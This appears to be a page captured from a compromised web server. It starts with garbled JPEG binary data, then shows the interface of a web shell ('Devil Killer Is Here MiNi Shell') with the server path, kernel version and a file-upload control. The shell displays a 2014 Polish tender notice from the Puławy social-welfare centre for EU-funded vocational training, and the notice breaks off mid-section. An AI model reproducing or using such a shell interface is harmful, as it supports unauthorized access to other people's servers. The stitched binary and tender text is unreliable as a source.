JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140717/240352-N-2014.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie szkoleń dla  beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 240352 - 2014; data zamieszczenia: 17.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Leśna 17, 24-100 Puławy, woj. lubelskie, tel. 81 458 62 01, faks 81 458 62 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie szkoleń dla  beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego:
w części 1 Sprzedawca z obsługą kasy fiskalnej, dla 7 osób, Termin wykonania zamówienia 01.IX-15 XII. 2014r
w części 2 Magazynier z obsługą wózków jezdniowych z napędem silnikowym, 5 osób, Termin wykonania zamówienia 01.IX-15 XII. 2014r.
w części 3 Fryzjer, 3 osoby, Termin wykonania zamówienia, 01.IX-15 XII. 2014r. 
w części 4 Kucharz małej gastronomii z minimum sanitarnym,2 osoby, Termin wykonania zamówienia, 01.IX-15 XII. 2014r.
w części 5 Opiekun osób starszych, niepełnosprawnych i zależnych, w tym dzieci, 3 osoby,Termin wykonania zamówienia, 01.IX-15 XII. 2014r.
w części 6 Operator koparko ładowarki klasa III ( wszystkie typy) zakończony egzaminem państwowym, 1 osoba, Termin wykonania zamówienia 01.IX-15 XII. 2014r.
w części 7 Prawo jazdy kategorii C, 1 osoba, Termin wykonania zamówienia 01.IX-20 XII. 2014r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 6 ustawy Pzp stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty (według wzoru stanowiący załącznik nr 3 SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na zmianie:
zmiany terminu rozpoczęcia lub zakończenia szkolenia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia oraz wystąpienia wyjątkowych sytuacji -jedynie za zgodą Zamawiającego;
zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ;
zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika w wyjątkowych sytuacjach, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych;
Zmiany ceny - cena jednostkowa będzie mogła ulec zmianie na skutek zmiany stawek podatkowych, dla przedmiotu zamówienia, wystąpienie o zmianę cen jednostkowych przez Wykonawcę musi odbyć się wyprzedzeniem, nie później niż 7 dni przed proponowaną data zmiany ceny;
Zmiany wynagrodzenia Wykonawcy za zrealizowane szkolenie może nastąpić wyłącznie w przypadku:
rezygnacji z udziału w szkoleniu osoby zakwalifikowanej na szkolenie- przed rozpoczęciem zajęć z przyczyn od niej niezależnych lub z powodu podjęcia przez nią zatrudnienia. Zamawiający w takim przypadku dokona dodatkowej kwalifikacji na dane szkolenie, a w przypadku braku takiej możliwości zapłata za szkolenie nastąpi za ilość osób faktycznie przeszkolonych;
rezygnacji z udziału w szkoleniu uczestników projektu - po rozpoczęciu szkolenia, z przyczyn od niego niezależnych lub z powodu podjęcia przez niego zatrudnienia w trakcie trwania szkolenia. Zapłata za szkolenie wyżej wymienionej osoby będzie obejmowała faktycznie poniesione koszty pomocy dydaktycznych, oraz pozostałe koszty, proporcjonalnie do okresu faktycznego uczestnictwa tej osoby w szkoleniu, na podstawie zestawienia kosztów opracowanego przez Wykonawcę, które to zestawienie zostanie przedłożone przez Wykonawcę do zaakceptowania  przez Zamawiającego.
Skierowania uczestników na badania i orzeczeniu o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich.
Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postepowania. Takimi zmianami są zmiany o charakterze administracyjno-organizacyjnym umowy np. zmiany dotyczące nazwy, siedziby wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, zmiana innych danych identyfikacyjnych, zmiany prowadzące do poprawy oczywistych omyłek pisarskich i rachunkowych w  treści umowy.
Zmiany wprowadzone do umowy będą obowiązywały po podpisaniu odpowiedniego aneksu przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.pulawy.pl/zamowienia_publiczne.htm,pl,8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy; pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2014 godzina 07:30, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Aktywni-niezależni realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej Działanie 7.1 - Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 - Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 7 osób ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 90 godzin dydaktycznych (po 45 minut).
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00.  
    Miejsce szkolenia: Puławy.
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Przygotowanie praktyczne i teoretyczne do wykonywania zawodu sprzedawcy z obsługą kasy fiskalnej
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
 ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 wykonania i opłacenia uczestnikom niezbędnych badań lekarskich orzekających brak przeciwskazań do pracy na danym stanowisku (badania do celów sanitarno-epidemiologicznych). Badanie obejmuje badanie lekarskie i badanie laboratoryjne. Kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi. 
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego: 
 wydania uczestnikom szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
 zapewnienia codziennego serwisu kawowego dla każdego uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym( m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenie dokumentacji zdjęciowej i przekazanie jej zamawiającemu na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 Wyniki egzaminu wewnętrznego oraz zaświadczenie opłacenia egzaminu zewnętrznego zostaną przedstawione zamawiającemu wraz z pozostałą dokumentacją.
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Magazynier z obsługą wózków jezdniowych z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 5 osób ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 120godzin dydaktycznych (po 45 minut).
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00.  
    Miejsce szkolenia: Puławy.
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: Celem szkolenia jest przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy, umiejętności i uprawnień na operatora wózka widłowego oraz zdobycie umiejętności prowadzenia gospodarki magazynowej co powinno umożliwić podjęcie zatrudnienia na rynku pracy.
Zakres tematyczny: Zagadnienia z gospodarki magazynowej,  jazda wózkami widłowymi, obsługa komputerowych programów magazynowych. Minimalny zakres tematyczny kursu winien być zrealizowany zgodnie z rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. Nr 70, poz. 650 z późn. zm.).
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: szkolenie zakończone egzaminem wewnętrznym i wydaniem zaświadczenia o jego ukończeniu oraz opłaceniu egzaminu teoretycznego i praktycznego sprawdzającym kwalifikacje w zakresie obsługi wózków widłowych przed komisją powołaną przez Urząd Dozoru Technicznego.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
 ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 wykonania i opłacenia uczestnikom niezbędnych badań lekarskich orzekających brak ewentualnych przeciwwskazań zdrowotnych do pracy na danym stanowisku kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi;
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zorganizowania i opłacenia egzaminu przed Komisją z Urzędu Dozoru Technicznego oraz wydania zaświadczenia uprawniającego do kierowania wózkami.
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego: 
 wydania uczestnikom szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
 zapewnienia na zajęciach teoretycznych codziennego serwisu kawowego dla każdego uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym( m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenia dokumentacji zdjęciowej i przekazania jej zamawiającemu na dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
Zamawiający dopuszcza możliwość dołączenia osób  do innej grupy szkoleniowej na terenie Puław o tej samej tematyce w tym przypadku zajęcia mogą odbywać się, zgodnie z harmonogramem grupy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Fryzjer.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 3osób ( +/- 1 osoba)
Liczba grup: 1 grupa.
